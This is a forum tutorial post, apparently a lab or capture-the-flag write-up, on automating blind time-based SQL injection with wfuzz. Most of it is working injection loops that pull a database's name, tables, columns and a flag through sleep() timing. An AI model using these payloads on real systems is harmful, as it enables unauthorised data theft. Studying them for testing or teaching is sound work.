Article: №3 Automating the exploitation of blind Time-based SQL injection using Burp
by OstapBender - Saturday December 16, 2023 at 07:04 PM
#1
Good afternoon, dear forum members!
Continued Article Automating the exploitation of blind Time-based SQL injection using Burp Suite and WFUZZ.
Obviously, the flag is not complete, because I left only 20 characters for the search, but you can compare this piece with what we saw at the beginning of the article and you will realize that we got a part of the real flag.
The whole process took me 20 minutes at most. Manually during this time we would have been able to extract only half of the table name. Many people will say that in Burp Suite Community version it takes much longer than in PRO version. I agree, but in our case, using the Community version will increase the time to solve the whole task by 10 minutes. To work with large databases via Time-based, it is best to use one of the fuzzers, whose speed is significantly faster. We'll turn to wfuzz, as it has an option that allows you to specify a range of numbers for phasing. Ffuf is also suitable, but for it we will have to create two dictionaries with numbers and phase by them.
Wfuzz
We will not reinvent the wheel now, as we already have all the necessary queries from the previous example. Let's just apply them for wfuzz.
Database name

for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF((ascii(substr(database(),$i,1)))=FUZZ,sleep(5),null)--+-";done > db && grep -F "5." db
[Image: 1699177378986-png.72034]
The search took me exactly 70 seconds. Now let's understand what we are doing here. We run a loop from 1 to 20 in the command line to execute the wfuzz program with our load and set the range for searching ASCII codes from 32 to 126. The result will be saved to the db file and then the grep command will be executed, which will leave only the values we need (that is, with a delay of about 5 seconds) and display it all on the screen. Only, if you notice, we already have all the characters sorted in the right order. We only need to recode them into alphanumeric form. The further algorithm is the same as in the previous example.
Table names

for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1), $i,1))=FUZZ,sleep(5),0)--+-";done > tables && grep -F "5." tables
[Image: 1699177504381-png.72035]
Column name
for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select column_name from information_schema.columns where table_name='flag_box' limit 1,1), $i,1))=FUZZ,sleep(5),0)--+-";done > columns && grep -F "5." columns
[Image: 1699177568369-png.72036]
Flag
for i in $(seq 1 20); do wfuzz -v -c -z range,32-126 "http://192.168.2.239/?id=1' and IF(ascii(substring((select name from flag_box limit 3,1), $i,1))=FUZZ,sleep(5),0)--+-";done > flag && grep -F "5." flag
[Image: 1699177658008-png.72037]
Well, that's it, I guess. I didn't bother here with normal filtering in the grep command to exclude unnecessary information in the output. I'm just lazy, and I'm already thirsty for beer. I think whoever has the desire will figure out how to organize output to the screen or to a file more nicely and write it in the comments. I will be grateful.
That's all for now. Thank you for your attention!
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] SQL Injection Strategies [Book] HeySiRI 54 8,992 02-22-2024, 09:58 AM
Last Post: DoesntMatter123456
  Gray Hat C#: A Hacker's Guide to Creating and Automating Security Tools DatePirate 16 1,907 01-17-2024, 01:22 PM
Last Post: bestkiller7810
  Article: No. 2 Methods of obtaining a Reverse shell OstapBender 0 685 12-16-2023, 08:34 PM
Last Post: OstapBender
  Article: No. 1 Methods of obtaining a Reverse shell OstapBender 0 667 12-16-2023, 08:09 PM
Last Post: OstapBender
  Article: №2 Automating the exploitation of blind Time-based SQL injection using Burp OstapBender 0 637 12-16-2023, 06:33 PM
Last Post: OstapBender



 Users browsing this thread: 1 Guest(s)